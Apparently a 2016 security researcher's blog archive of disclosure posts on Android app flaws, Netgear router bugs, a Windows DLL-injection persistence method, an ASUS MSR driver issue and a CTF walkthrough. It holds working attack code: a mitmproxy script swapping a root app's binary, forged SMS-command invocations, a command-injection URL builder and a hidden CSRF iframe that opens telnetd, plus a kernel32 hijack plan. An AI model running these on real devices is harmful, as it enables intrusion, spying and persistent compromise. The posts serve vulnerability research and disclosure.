Saturday, July 9, 2016

Android attack surfaces - part II

Hello again,

Continuing our Android attack surfaces topic, today we'll discuss common network attacks.
"Network attacks" is a huge topic, so we'll focus on internet-based update mechanisms.

The HTTP attack surface

HTTP is frequently used in modern Android apps.
Some of it is (quite) harmless, like presenting ads or viewing content, while other uses could be dangerous.
Particularly, using HTTP as an update mechanism could be fatal.
These are some common scenarios:

  1. Loading a DEX file (via DexClassLoader) downloaded from HTTP without validation.
  2. Extracting a ZIP received from HTTP without validation.
  3. Executing commands (via Runtime.exec) received from HTTP without validation.
  4. Executing binaries downloaded from HTTP without validation.
All of the above might result in a remote code execution. The important part (in my opinion) is the "validation" part: trusting plain HTTP is ill-advised.
Sometimes, the validation itself is broken. For example, validating a downloaded DEX file by comparing its SHA1 against a SHA1 value that is also downloaded over HTTP is no solution at all - the attacker controls both.
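For contrast, here is a sketch of validation done right: the expected digest is pinned inside the App itself, so a network attacker cannot tamper with both the payload and its checksum. The payload and digest below are illustrative placeholders:

```python
import hashlib

# Hypothetical pinned digest -- in a real App this ships inside the APK,
# never alongside the HTTP download.
PINNED_SHA256 = hashlib.sha256(b"trusted update payload").hexdigest()

def validate_update(data, pinned=PINNED_SHA256):
    # Compare the downloaded bytes against the digest baked into the App.
    return hashlib.sha256(data).hexdigest() == pinned
```

Better still, verify a digital signature against a pinned public key, so the update contents can change without shipping a new APK.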
We'll discuss a simple scenario in which an App running with root privileges downloads a binary file over HTTP without validating it:

Root Browser is a popular app that lets users of rooted phones view and edit files anywhere on the device (even in restricted locations such as the "/system" partition).

Busybox via HTTP

RootBrowser requires a special busybox to function. busybox is a single binary that bundles many shell utilities together; the set of utilities is chosen at compile time.
Using the busybox binary is straightforward: invoke it with the desired utility name and arguments. For example, to create a zip archive, run:
busybox zip file1 file2 file3
Usually, appropriate symlinks are installed such that one can simply invoke "zip file1 file2 file3".
Since RootBrowser cannot rely on the existence of a busybox on a vanilla system, it installs its very own busybox (yes, in the /system partition!).

So, what's so dangerous about busybox? busybox is EXTREMELY dangerous here, since:

  1. It is run by a root App, meaning that it is omnipotent (aside from SELinux restrictions - more on that in upcoming posts).
  2. It might do malicious stuff. Can you completely trust the App developer?
  3. You have to understand where the busybox binary comes from.
Android Apps can have assets. Assets are quite similar to resources, but unlike resources they are not assigned an ID (resource IDs are exposed through a generated class called R). Assets are bundled inside the APK, under the "assets" directory.
For some reason, the App developer decided not to bundle busybox as an asset (or rely on Google Play's update mechanism) and instead downloads it from his own server - over plain HTTP.
Here is the relevant code (just look for "http://" references in the App itself):

The code gets a string (an "asset name") and checks whether it already exists. If it does not, it downloads the asset over HTTP.
This means that an attacker with man-in-the-middle capabilities could serve the user an evil asset, which will later be executed!
Since the App runs as root, the evil busybox can do (almost) whatever it wants.
For HTTP-MitM, one might use mitmproxy.
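To illustrate how trivial the attack is, a mitmproxy script along these lines could swap the binary in transit. The URL substring and the payload bytes are placeholders, not the App's real download URL:

```python
# Sketch of a mitmproxy script: any HTTP response whose URL looks like the
# busybox download gets its body replaced with an attacker payload.
EVIL_BUSYBOX = b"\x7fELF...evil payload here..."  # placeholder bytes

def response(flow):
    # mitmproxy invokes this hook for every completed HTTP response.
    if "busybox" in flow.request.pretty_url:
        flow.response.content = EVIL_BUSYBOX
```

Run it with `mitmproxy -s script.py` while routing the victim's traffic through the proxy.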


HTTP man-in-the-middle attacks are commonly overlooked, yet super-simple to exploit.
An App developer should never trust non-HTTPS communications.
Furthermore, root App developers should be extra careful, since a remote code execution on rooted Apps doesn't (mostly) require any privilege escalation.

Disclosure timeline

  • June 11th: discovered issues.
  • June 12th: contacted App developer.
  • June 12th: App developer replies that the new App is not ready yet, but will not download assets from HTTP.
  • June 13th: asked how much time the fix would take; no response.
  • July 2nd: queried the App developer again; no response.
  • July 8th: sent the App developer a 3rd notice; no response.
  • July 9th: full disclosure.

Saturday, May 7, 2016

Android attack surfaces - part I


After some time, I've decided to talk about Android security and attack surfaces.
In the first part we'll introduce the fundamentals of Android, so feel free to skip it if you're proficient in Android security.

Android 101

Android is based on the Linux kernel, with some modifications.
Here are some major security \ core OS concepts:

Apps and Dalvik

Android users run Apps. An App may consist of several system processes, but these are logically "linked" together. Apps are bundled in an archive called an "APK".
The APK file has several interesting files and directories in it:
  • AndroidManifest.xml - this is the App's metadata. It specifies the App's permissions (e.g. reading from the SD card or using the camera) and the App's entry points. An App can have multiple entry points - these are the common types:
    • Activity - the common entry point, anything that the user can act upon. From the GUI point-of-view, you can think of an activity as a form.
    • Service - a part of the App that can perform long-running operations in the background (e.g. playing music).
    • Content provider - anything that might provide content to other Apps. Android itself manages a few content providers of its own.
    • Broadcast receiver - a component that responds to broadcast messages, sent by the system or by other Apps (e.g. boot completed, SMS received).
  • classes.dex - this is where the magic happens. All of the code is bundled here. Android code is typically written in Java, but compiled to a special bytecode (DEX), executed by the Dalvik VM (or by ART on newer platforms). Android's Java implementation is based on Apache Harmony.
  • META-INF: digital signatures on every file in the archive. Android security dictates that all Apps are digitally signed.
  • lib - where native libraries reside. Android permits writing libraries in C or C++ and invoking their code using JNI. Most App developers don't ship native libraries, but some do - mostly for performance or to use closed-source libraries.

App permissions

As with every Linux machine, each file has permissions. These permissions specify the entities that are permitted to Read, Write or eXecute the file (hence the "rwx" abbreviation).
The entities themselves are the file's owner User, the file owner's Group and Others ("ugo").
The permissions themselves can be changed by invoking the chmod command.
Android itself creates a user for each application (in the Android terminology, an app has an Application ID or AID for short).
Most of the App's permissions (e.g. READ_EXTERNAL_STORAGE) are translated such that the App's "user ID" belongs to a specific group.
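This permission-to-GID mapping is declared in /etc/permissions/platform.xml; a short excerpt (exact contents vary between Android versions):

```xml
<!-- /etc/permissions/platform.xml (excerpt) -->
<permissions>
    <!-- holding INTERNET places the App's UID in the "inet" group -->
    <permission name="android.permission.INTERNET" >
        <group gid="inet" />
    </permission>
    <permission name="android.permission.WRITE_EXTERNAL_STORAGE" >
        <group gid="sdcard_rw" />
    </permission>
</permissions>
```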
Of course, some changes were made in the kernel (e.g. enforcing that only Apps with specific permissions could open sockets).

IPC mechanisms

Another important Android concept is its IPC. Most of the traditional SysV IPC mechanisms are almost completely stripped out; instead, IPC is implemented by a kernel driver called "the binder".
There are many abstractions to invoking the binder, one of the most commonly used is an intent.
An intent could be sent from one App to another, from within an App to itself, or just to "anyone who matches certain criteria". The first two are known as "explicit intents", and the last is known as an "implicit intent".
Implicit intents are resolved by the concept of intent-filters, which are declared by an App in its manifest.


There are other notable security features that might interest us:
  • Android has embedded its own version of SELinux (dubbed "SEAndroid"). This means that even the root user isn't omnipotent anymore.
  • In Android, certain App permissions can only be bestowed upon "System Apps". These Apps are commonly pre-installed on the phone, and reside on the "/system" partition (as opposed to user Apps, which are installed on the "/data" partition). A fine example of such a permission is the ability to silently install a new App.
  • Android has full ASLR and DEP protections.

The SMS attack surface

In this post we'll discuss the SMS attack surface. It is often overlooked, but interesting nonetheless.
We'll do this by example - let's examine the "Wheres My Droid" App. Its main goal is to locate your phone in case you lose it. Note the App information and, specifically, the number of installations:

Downloading the APK could be done in several ways:
  1. Getting the APK from the filesystem (could be done via ADB - thanks sergej a.k.a. winnie for the remark!).
  2. Performing MITM on the Google Play services (requires installing a certificate).
  3. Downloading from 3rd parties who do these for you - for free.
I personally use the 3rd option.
After we've downloaded the APK, we should conduct some research. There are plenty of good tools out there:
  1. apktool - this great tool decodes the AndroidManifest file into a human-readable format and translates the Dalvik bytecode into smali code. It can also be used to repack an App.
  2. dex2jar - used to translate an APK's code to a JAR (losing data such as the Android manifest).
  3. jd-gui - a Java decompiler for our JAR.
  4. JEB - an all-in-one tool (not free).
Let's use apktool first:

Great, now let's examine the App's permissions in the manifest file:

Indeed, lots of permissions! Note the RECEIVE_SMS permission - this is exactly our attack surface!
Exploring the manifest further reveals the following:

This defines a broadcast receiver which handles SMS messages.
Let's examine the receiver's code using dex2jar and jd-gui:

Many APKs use some kind of obfuscation, but this one doesn't. In an obfuscated App, most of the classes have names like "a", "b" and "c", and meaningful strings are nonexistent.
The onReceive method is the receiver's entry point, and it gets the SMS from the intent argument's extras. Note that another intent is fired for each message. The intent is sent to a service called "SMSHandlerService", with two extra fields: "FROM" and "MESSAGE".
So, let's examine the SMSHandlerService:

Examining checkAttrWord gives us the following (code snippet is trimmed):

So, what do we have?

  1. SMS message is delivered to SMSReceiver's onReceive() method.
  2. SMS message is passed as an intent to SMSMessageHandler's onHandleIntent() method.
  3. According to the message's content, an action is performed. Supported actions:
    1. Upgrading App to the Pro version (hardcoded "wmdprounlock").
    2. Checking whether the App is installed (hardcoded "wmdinstalled").
    3. Ringing (from the App's context).
    4. Getting GPS coordinates.
    5. Taking a picture from the front or back camera.
    6. Locking or unlocking the phone.
    7. Wiping the phone's memory.
The codes for most of the features (e.g. getting the GPS info) are not hardcoded, but acquired from the App's shared preferences. However, there are default values, and the App doesn't force you to change them:
  • "WMD Ring" - ringing.
  • "WMD GPS" - getting GPS location.
  • "WMD Camera Front" and "WMD Camera Back" - taking silent photos from the camera.
  • "WMD Lock" and "WMD Unlock" - locking and unlocking the phone.
  • "WMD Wipe" - wiping the device.
These could all be acquired from the App's string resources (strings.xml):

Note some issues here though:
  1. Locking, unlocking and wiping the phone require the App to be a "Device Administrator", which is not the case by default.
  2. Except for ringing and getting GPS info, all actions require the Pro version. This is easily bypassed with the hardcoded upgrade code - which is kind of embarrassing: the developers sell the upgrade as an in-App purchase, even though you can get it for free!
  3. The App lets you add a blacklist or a whitelist, but doesn't force you (this feature is turned off by default).
  4. The App lets you change the "attention words", but doesn't force you.
The result is returned via an SMS message to the sender.
Besides sending an SMS message, other Apps that are installed on the phone could cause damage as well.
In Android, receivers can be exported or internal. Here, the receivers are exported, which means that another App on the device could forge an intent and trigger these actions on its behalf.
This is a very common bug: App developers should keep their activities and receivers unexported whenever possible, and must never trust the input they receive!
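For example, the exported component could be poked directly over adb, no SMS needed. A sketch of building such an invocation - the component name is a guess for illustration; take the real one from the decoded manifest:

```python
import shlex

def forge_wmd_command(message, sender="1337",
                      component="com.example.wmd/.SMSHandlerService"):
    # Builds an `adb shell am startservice` invocation that feeds the exported
    # service the same extras the SMS receiver would ("FROM" / "MESSAGE").
    # The component name above is hypothetical -- read it from the manifest.
    cmd = [
        "adb", "shell", "am", "startservice",
        "-n", component,
        "-e", "FROM", sender,
        "-e", "MESSAGE", message,
    ]
    return " ".join(shlex.quote(p) for p in cmd)
```

Sending `forge_wmd_command("WMD GPS")` from a shell would exercise the same code path as the attention-word SMS.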


Even though it's not remote code execution, this very popular App lets an attacker upgrade it (free of charge), take silent pictures, get GPS info and, in some cases, even wipe or unlock the phone!
The problem is that the App trusts the SMS message that it gets, without verification.

Disclosure timeline

  • April 20th, 2016: discovered issues.
  • April 21st, 2016: contacted App developers with no response.
  • May 1st, 2016: tried to contact App developers for the second time.
  • May 7th, 2016: public disclosure.

Saturday, March 26, 2016

BugSec challenge - walkthrough

In this post I'll write my own solution to BugSec's challenge.
This challenge appeared in November 2015 and can be found here.
Since a few months have passed, I think I can share my solution.

First analysis

So, extracting the RAR file reveals two files:
  • BugMe 0x01.exe - a normal 64-bit PE.
  • BugMe - a binary file (blob).
Running "BugMe 0x01.exe" results in the following output:

So, the next step is to understand what the EXE does. You can run tools like procmon to understand a little, but you'll resort to static analysis sooner or later.
Opening it with IDA reveals lots of interesting strings:

So, since we got the "Unable to open file" error, we'll look into that. It is referenced by function 0x140001220, which tries to open a file called "bs" (using fopen). It will present that error upon failure.
After a successful open, it seeks to the file's 3rd byte and compares it to 0x47 ("G"). If the bytes differ, another error is presented ("couldn't verify the file."). Otherwise, the function at 0x140001160 is invoked with the FILE* as its sole argument:

At that point, we can quite safely assume that the executable checks the binary file's integrity.
Examining function 0x140001160 reveals a simple anti-debugging trick:

This looks for an "ollydbg" window. If found - it quits the process immediately.
Later on, that function reads the byte at offset 0x5F1A and compares it against 0x58 ("X"). If the comparison succeeds, we proceed to function 0x1400010C0.
Similarly, that function compares byte 0x271 to 0x55 ("U"), and continues to function 0x140001000.
The function at  0x140001000 compares byte 0x4656 to 0x48 ("H"), but does another basic anti-debugging trick:

The OutputDebugString function with a "%s%s%s..." format string screws up some debuggers (e.g. old versions of OllyDbg).
So, we're going to fix the binary blob as such:
  1. Rename it to "bs".
  2. Fix byte at offset 0x3 to 'G'.
  3. Fix byte at offset 0x5F1A to 'X'.
  4. Fix byte at offset 0x271 to 'U'.
  5. Fix byte at offset 0x4656 to 'H'.
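These fixes are easy to script; a minimal Python sketch using the offsets from the steps above (file handling left out):

```python
# Patch the four magic bytes into the blob, per the steps above.
PATCHES = {0x3: ord("G"), 0x5F1A: ord("X"), 0x271: ord("U"), 0x4656: ord("H")}

def patch_blob(data):
    buf = bytearray(data)
    for offset, value in PATCHES.items():
        buf[offset] = value
    return bytes(buf)
```

Run patch_blob over the blob's bytes and save the result as "bs" next to the EXE.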
After fixing all of these, we get a "reasonable" output:

And the "bs" file is revealed to be a PNG:

Blue pill? LSBs?

This is obviously a steganography challenge. "LSBs" must refer to Least Significant Bits, while "blue" must refer to the blue component in a pixel encoding (RGB). Trying to extract the LSBs of the blue components might have led people to a valid solution, but I didn't see it at the time.
Thinking about LSBs some more, I figured that embedding data in the LSBs must have changed the background color in a way that is indistinguishable to the human eye.
I know there are tools for this, but I decided to simply recolor the background in red. Examining the left column closely reveals that there is encoded data there:

The left column contains 700 pixels, which isn't great - for standard LSB encoding we'd expect a number divisible by 8. However, not all is lost - some encodings use only 7 bits per character (e.g. 7-bit ASCII), and 700 divides evenly into 100 such characters. So, let's extract the LSBs of the left column and convert them to 7-bit ASCII characters:
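The decoding step boils down to: walk the left column top to bottom, take each pixel's blue-channel LSB, and group the bits into 7-bit characters. A sketch of the bit-grouping logic, assuming MSB-first ordering (pixel access via Pillow is shown only as a comment):

```python
def bits_to_ascii7(bits):
    # Group a flat bit list into 7-bit characters (MSB first);
    # trailing bits that don't fill a full character are dropped.
    chars = []
    for i in range(0, len(bits) - len(bits) % 7, 7):
        value = 0
        for bit in bits[i:i + 7]:
            value = (value << 1) | bit
        chars.append(chr(value))
    return "".join(chars)

# With Pillow, the bit list would come from something like:
#   img = Image.open("bs.png")
#   bits = [img.getpixel((0, y))[2] & 1 for y in range(img.height)]
```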

And running it:

This is clearly the solution. Note that the suffix is padded with 0xFF bytes, which is why you see those weird characters at the end.


This challenge was very fun and quite straightforward - no real tricks besides some basic anti-debugging tricks and some steganography.
If you solved this challenge using different methods - please share!

Sunday, March 20, 2016

Netgear's DGN2200 - multiple vulnerabilities

So, as a good 1st embedded-related post, I'd like to share some vulnerabilities I found on a firmware version for NetGear's DGN2200 router. Of course, it was all responsibly disclosed.
These vulnerabilities were found on a custom Bezeq firmware; however, they may reside in other Netgear firmware as well.
I have to state that Bezeq cooperated responsibly and stayed in touch with me the entire time.
As I said, the issues may still reside in Netgear's own firmware, even though Netgear didn't acknowledge them.

Getting started

Like most routers, the DGN2200 allows HTTP administration. This is an appealing attack surface, and I'm going to examine it. Anyway, it's always a good idea to see if there are any more interesting services:
So, we have DNS, UPNP and HTTP. Although the DNS and UPNP might be interesting, we will first examine the HTTP.

Extracting the filesystem

The first thing we want to do is to download the firmware -- you can download it yourself from the official website. The next thing I'm going to do is to try and extract a filesystem from the firmware.
I'll use binwalk, which is a great tool designed especially for this:

Good, we found a JFFS2 image - a filesystem widely used in embedded devices. The firmware modification kit (FMK) can also extract and mount the filesystem for you.
Alright, let's investigate the filesystem itself.

Where are my cgi files?

Normally, we'd like to examine the following:
1. Initialization scripts - usually in "/etc/init.d" or "/etc/rc.d".
2. Configuration files - in "/etc/*.conf".
3. The "/www" directory.

Examining the /etc/init.d/rcS reveals nothing interesting - just mounting /proc, initialization of fstab, etc... Configuration files reveal nothing of interest either... So, it's time to examine the "/www" directory.

Once we examine files in this directory, we cannot find any cgi files, although the web interface uses them a lot! So, where are my cgi files?

Let's think about the HTTP interface: a process ("httpd") opens a listening socket on port 80 and serves requests. That process is responsible for serving both the HTML files and the CGI, yet there are no CGI files at all... So, let's examine httpd itself:

So, the cgi files are probably "baked" into httpd. Further examination reveals HTML code inside the httpd image as well. So, our next step is to reverse-engineer chunks of the httpd!

Reversing httpd

The httpd image is a MIPS ELF file. It can be easily parsed by IDA. Since we'd like to examine the authentication procedure, we'll look for related strings. One is quickly found: "Authorization: Basic". This is used in basic HTTP authentication, in which the username and the password are sent in Base64. Reversing some parts of the enormous function that uses this string reveals some very interesting issues... Generally, the code does the following:

At that point, "auth_blob" points to the base64 string in the HTTP header.
Basically, after decoding (in-place), the code finds a colon (which separates the username from the password), places a NULL terminator and uses strcpy to copy the username to a global variable called USERNAME. That variable is a global array of 0x14 bytes. This means that a long enough username can corrupt memory by overwriting adjacent global variables!
Unfortunately, I didn't find any usable global variables later on, so I decided to remember that memory corruption thing and look elsewhere.

So, my second thought was: "what pages don't require authorization at all?". Finding the code that filters out pages that don't require authorization was easy, and revealed a second bug:
As you can see, the files "utility.js" and "browser.js" are compared against the requested filename (referenced by the $a0 register) using strcmp (not the safest choice, but whatever). However, the third block reveals a serious problem - in order to exempt every filename containing "ess_" from authorization, the code uses strstr! This means we can bypass authorization simply by adding an "ess_" GET parameter to the URL!
This issue allows an attacker (from within the LAN) to bypass all authorization, even if the credentials were changed from the default "Admin:Admin".

Extending our reach from within the LAN

So, what can an attacker do after bypassing authorization? A tempting thing to do would be to change the router's firmware - but it takes time, resets the router and therefore - not so stealthy. Can we run arbitrary commands on the router? Commands are usually carried out by invoking "system" - so let's look for xrefs! The first xref shows a promising result:
Basically, "ping -c 4 %s %s" is passed to sprintf with (hopefully) controllable strings, and the result is sent to the "system" API. Sniffing the ping page's traffic reveals a very simple structure: the address parts are sent as separate variables (IPAddr1, IPAddr2 and so on), and another variable contains the entire IP address (ping_IPAddr). So, assuming ping_IPAddr is what lands in the first "%s", we could use a pipe (|) to inject a command!
Let's try it now:

This should create a file called "pwned" in the /tmp directory. Debugging the router (using telnet from the LAN) proves our command injection works, as there is now a "pwned" file:
Combining this with our authorization bypass means that an attacker (from the LAN) can run arbitrary commands on the router, without authentication! Using Linux backticks (`) also works.
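Putting the two bugs together, a single URL does the job. A sketch of how such a request could be constructed - the page name and parameter names here are assumptions based on the sniffed traffic, not verified against the firmware:

```python
from urllib.parse import urlencode

def build_exploit_url(router="192.168.1.1", command="telnetd"):
    # Page and parameter names are guesses -- adjust to the real form fields.
    params = {
        "ping_IPAddr": "1.2.3.4| " + command,  # pipe injects into `ping -c 4 %s %s`
        "ess_": "1",                           # strstr() match skips authorization
    }
    return "http://%s/ping.cgi?%s" % (router, urlencode(params))
```

Fetching the resulting URL from inside the LAN should run the injected command without any credentials.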
Another cool trick is getting output from our commands. It turns out the ping command writes its output to "/tmp/diag.conf"; the CGI then parses that file and displays its contents in the result page. Note that the CGI expects "PING" to be the first word.
Our next target is to finish this off by extending our reach to the WAN.

Attack from the WAN

So, a user on the LAN can compromise the router with a single HTTP request. Our goal is to make someone do that for us - while we're on the WAN.
Let's assume that our victim is behind the router, and doing some HTTP traffic. Let's also assume that we're the man-in-the-middle (MITM) between the router and the desired HTTP server. Since the victim is definitely in the LAN, and since we're MITM - we can inject code to the response HTML code (e.g. via an iframe) that would make the victim's browser send another HTTP request!
That kind of attack is called CSRF, and our router is vulnerable to it. That's it - assuming HTTP MITM, we can run an arbitrary command on the victim's router!

Combining the pieces + exploit code

This is the complete attack scenario:
1. Victim is behind the router, and surfs to an HTTP server.
2. Attacker modifies the server's response and injects a hidden IFRAME (of size 1x1, etc...).
3. IFRAME's src attribute is: "|command".
4. Note that we've combined authorization bypass and the command injection.
5. Victim's browser parses result and sends another HTTP request, this time to the router.
6. Since the victim is in the LAN, router responds to HTTP requests (via the httpd process).
7. Due to "ess_", httpd skips authorization.
8. Due to command injection, httpd runs arbitrary command.
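Steps 2-4 boil down to injecting one small HTML snippet into the server's response. A sketch of generating it - the page and parameter names are assumptions carried over from the sniffed ping form:

```python
def csrf_iframe(router="192.168.1.1", command="telnetd"):
    # 1x1 hidden IFRAME the MITM injects into any plain-HTTP response; its src
    # combines the "ess_" authorization bypass with the ping command injection.
    # Page and parameter names are guesses based on the sniffed ping form.
    src = "http://%s/ping.cgi?ess_=1&ping_IPAddr=1.2.3.4%%7C%s" % (router, command)
    return ('<iframe src="%s" width="1" height="1" '
            'style="display:none"></iframe>' % src)
```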

So, I've written an exploit code (HTML file) that creates an arbitrary file on the router's filesystem and opens telnetd.
My POC can be found here:


In this post, we've seen the following issues:
1. Authentication bypass vulnerability from the LAN.
2. A possible memory corruption from the LAN whilst authenticating.
3. CSRF vulnerability.
4. Command injection via the ping tool.

These could be easily avoided by firmware vendors, especially the first two issues that are caused by unsafe libc functions - strstr and strcpy. Command injection could also be easily avoided by sanitizing the user's input! Avoiding CSRF is also a common practice.

Anyway, by applying HTTP MITM, an attacker could run commands on the victim's router, remotely and silently. This could lead to a nice grip on the victim's network, and potentially to attacks on the victim's machines (can you think of creative ways?).

Disclosure timeline

  • February 10th, 2016: discovered 3 issues: memory corruption, authorization bypass, CSRF.
  • February 10th, 2016: supplied technical details to Netgear, including POC code.
  • February 12th, 2016: Netgear's response - they claimed that only the Bezeq firmware is vulnerable.
  • February 13th, 2016: discovering command injection vulnerability, updating Netgear.
  • February 14th, 2016: contacted Bezeq.
  • February 21st, 2016: Bezeq acknowledged.
  • March 3rd, 2016: Bezeq's first hotfix for the authorization bypass vulnerability.
  • March 20th, 2016: disclosure, assigned DWF-2016-91000.

Saturday, March 19, 2016

Injection via DosDevices


In this post I'll propose a novel persistent injection method for Windows.
As far as I know, it has not been implemented before.
The goal is to covertly inject a DLL into (almost) every userland process.
So, let's get down to business!


It all began when I first encountered the subst command. To those who are unfamiliar - it allows one to create a virtual drive and map it to an arbitrary path. Some reading exposed that it uses the "DefineDosDevice" WinAPI, which is great.
Furthermore, it is documented that you can make these virtual drives persist between reboots by registering entries in the registry. Here's Wikipedia's entry on this subject:

"... with a registry modification it is possible to assign a path to a drive letter during startup so it is available to system services and persists across a reboot.
Create a new registry entry "String Value" in the following key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices
The name should be  "X:"  where X is the drive letter".

Well, since I wanted to have a persistent drive "T:" for my temporary files, I did just that.
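The same persistent mapping can be created programmatically via the registry. A Windows-only sketch; the drive letter and target path are examples:

```python
import sys

def add_persistent_drive(letter="T:", target=r"\??\C:\Temp"):
    # Writes a value under the "DOS Devices" key, so smss.exe recreates the
    # symbolic link on every boot. Targets use the NT "\??\" path prefix.
    if sys.platform != "win32":
        raise OSError("DOS Devices mappings only exist on Windows")
    import winreg
    key = winreg.OpenKey(
        winreg.HKEY_LOCAL_MACHINE,
        r"SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices",
        0,
        winreg.KEY_SET_VALUE,
    )
    winreg.SetValueEx(key, letter, 0, winreg.REG_SZ, target)
    winreg.CloseKey(key)
```

Note that writing to this HKLM key requires administrative privileges, and the new drive only appears after a reboot.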
Surprisingly, I found that there are already some entries in the registry:

These entries come with a clean installation, and are used for backward compatibility, as well as maintaining helpful symbolic links (e.g. NUL). Using winobj, you can see that all of these are indeed symbolic links (under "GLOBAL??"):

Can you see the "AUX" and "PIPE" there? These are taken from the DosDevices registry key.
What about "C:"? Did you know that your drive letters are in-fact, symbolic links?
So, our goal would be to take advantage of the fact that symbolic links are mapped from the DosDevices registry key. Our next goal is to understand who maps these symlinks.


According to documentation, the process in charge of these mappings is smss.exe. This happens quite early in the boot sequence, which makes sense - most processes need these symbolic links!
My first idea was to override "C:" and see what happens - it wreaked havoc on my VM: an endless BSOD loop... At that point, it was clear we'd have to understand the boot sequence, starting from smss.exe.
So, what does smss.exe do? This process is the "Session Manager SubSystem" (hence "smss"), and it's responsible for plenty of usermode global initializations, such as creating environment variables, launching csrss.exe, creating pagefiles, etc...
It's also responsible for two major features, which we're going to abuse:

  1. Create DOS device mappings (via symbolic links), as we've discussed.
  2. Map the known DLLs.

So, we've already talked about the DOS device mappings, but what about "known DLLs"?
Well, "known DLLs" is a mechanism which improves performance of DLL loading to new processes. For example, when a process starts, it will probably load some common DLLs (e.g. kernel32, user32, etc...). So, instead of reading them from the disk each time (by the Windows loader), they could be mapped as global sections and loaded from memory. The Windows loader maps these sections to the new process, which lessens IO overhead.
The known DLLs reside in HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs. The default folder for the known DLLs themselves resides in a value called "DllDirectory", and by default it's "%Systemroot%\system32". Also, by default, only "TrustedInstaller" can change these values.
Luckily, %Systemroot% is translated to "C:\Windows" (assuming C: is our system partition), so known DLLs will get loaded from "C:\Windows\System32"...
Also, it appears that smss.exe maps these DLLs only after creating the symbolic links!
Furthermore, it appears that the only work smss does between the DOS device mappings and the known-DLLs handling is file renaming (via kernel32!MoveFileEx), which has no dire consequences:

Putting it all together

So, let's assume that we have a machine with (at least) two partitions:

  • C: - the system partition. It is mapped as "\Device\HarddiskVolume1".
  • D: - another partition. It is mapped as "\Device\HarddiskVolume2".
An attacker could do the following:
  1. Create a "hidden" folder in "D:\Whatever\Evil\Windows\System32".
  2. Write an "evil" kernel32 and place it in that folder.
  3. Register a symbolic link that maps "C:" to "\Device\HarddiskVolume2".
  4. In order to survive, the first thing that the evil kernel32's DllMain does is to remap the symbolic link of "C:" back to "\Device\HarddiskVolume1". This is done by invoking the DefineDosDevice API.
Since our evil kernel32 is now mapped as a known DLL, we're injected into each and every userland process for free!
We're also able to persist (i.e. survive reboots), in a manner that tools like autoruns are unaware of.

Thursday, March 17, 2016

Bloatware considered harmful

Hi again,

So, this time I plan to reverse some Windows "bloatware". Microsoft has really improved their software's security and robustness; however, 3rd party vendors have not.
This time I'm going to focus on an ASUS service.

Hello atkex

The "atkexsvc.exe" process really caught my attention. A signed service running under WOW64 sticks out like a sore thumb.
Looking for interesting strings revealed that it probably has some modules written in Borland Delphi (FastMM). This is particularly interesting because it tries to side-load a very special DLL which is in charge of memory allocation:

This is indirectly called from every allocation \ deallocation, which is kind of nice. However, that's not my main focus today.
Examining this process with Process Explorer reveals a very interesting DLL:

Purple means a "packed image". Why would an ASUS DLL be packed? In my experience, packed binaries often hide nice surprises. The packing was fairly standard:

Unpacking revealed lots of strings that seem to handle "CPU voltage", "Physical core selection" and so on.
There are plenty of subroutines, most of them look quite similar... The most interesting part was the DLL's import table, which referred to a dll called "ASIO" with plenty of interesting functions:

Well, "ASIO_WriteMSR", here we come!

MSRs 101

In Intel architecture, MSRs are "Model Specific Registers".
These are registers that contain various data which is... Well... Model specific!
They are described in Intel 64 and IA-32 architectures software developer's manual, and contain a lot of information.
MSRs are read using a privileged instruction called "rdmsr", and written with "wrmsr". These instructions can only be executed from ring0 (kernel mode).
This means there is a driver serving those requests for the ASIO DLL. Does that driver verify its input?
So, the first thing we have to do is reverse ASIO DLL.
Surprisingly, it's not packed, and written in C. It contains interesting exports like "OC_GetCurrentCPUFrequency", "GetPortVal", etc...
Understanding the structure of the input and output buffers that are sent to the IOCTL to the driver was trivial:
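For illustration, here is how such a request buffer might be packed in Python. The field layout and sizes are assumptions, not the driver's actual structure - recover the real layout (and the IOCTL code) from the reversed code:

```python
import struct

# Hypothetical layout: a 32-bit MSR index followed by the 64-bit value,
# little-endian -- a typical shape for a wrmsr request (the edx:eax split
# would be done inside the driver).
def pack_msr_request(msr_index, value=0):
    return struct.pack("<IQ", msr_index, value)

IA32_LSTAR = 0xC0000082
request = pack_msr_request(IA32_LSTAR)
```

The resulting buffer would then be handed to the driver via DeviceIoControl, with the output buffer receiving the MSR value on a read.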

The real question is - whether the driver validates MSR values...
We can do it by either reversing, or just trial and error... By reversing:

As you can clearly see, the driver does not validate anything. Same thing happens in other functions.
Understanding the structure of the MSR requests, I built a Python script to do the same as ASIO does. Trying it out gives satisfying results.
Of course, the driver is signed (note the interesting path for an x64 driver):


So, what can we do if we can access MSRs?
A very interesting MSR (on x64) is IA32_LSTAR (0xC0000082). It points to the function executed whenever a SYSCALL instruction is invoked (this is the value that RIP gets). Naturally, the kernel sets it to KiSystemCall64. Other MSRs set the CS and RSP values as well.
As a proof of concept to an information leak, you can take the Python script and do the following:

Note the printed address. After a reboot, the result might be different.
What else can we do? Another cool MSR to override is IA32_EFER (0xC0000080). It contains configuration flags; bit #11 (NXE) controls whether DEP/NX is enforced. If we could write to that MSR, we could disable the DEP mitigation!
However, things are not so simple: Windows PatchGuard kicks in and prevents modification of certain MSRs. This does work on older Windows versions, though.
Anyway, POC code can be found here:

Disclosure timeline

  • March 4th, 2016: contacted AsusTEK via mail and online chat. AsusTEK blamed it on Microsoft!
  • March 5th, 2016: contacted the Microsoft security response center.
  • March 10th, 2016: Microsoft acknowledged and asked AsusTEK to fix.
  • March 16th, 2016: AsusTEK refused to admit their mistakes.
  • March 17th, 2016: public disclosure, assigned DWF-2016-91001.